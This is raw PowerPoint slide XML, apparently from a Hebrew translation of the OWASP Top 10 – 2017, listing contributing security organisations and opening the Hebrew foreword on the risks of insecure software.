              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Easybss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Edgescan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EVRY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EZI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hamed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I4 Consulting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iBLISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguran̤a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intelig̻encia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ITsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Khallagh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linden Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limacher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dienstleistungen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Micro Focus Fortify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Minded Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>National Center for Cyber Security Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Test Labs Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Osampa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Paladion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Purpletalk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shape Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SHCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Softtek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Synopsis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vantage Point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Veracode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11078437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6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953437434"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="8156448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336758">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>הקדמה</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6080777">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוכנות בלתי מאובטחות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מערערות את הכלכלה, הבריאות, הביטחון, האנרגיה ותשתיות קריטיות נוספות. ככל שהתוכנות שלנו הופכות מורכבות יותר, ומחוברות, הקושי להשיג פיתוח מאובטח עולה. הקצב המהיר של תהליכי פיתוח תוכנה הופך את הסיכון להכרח לגילוי ופתרון מהיר ומדויק. איננו יכולים יותר לגלות סבלנות כלפי בעיות אבטחה פשוטות בדומה לבעיות המתוארות בגרסה זו של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חלק מהותי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מהמשוב התקבל במהלך יצירת מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, יותר מכל מאמץ אחר מקביל שנערך ע"י ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
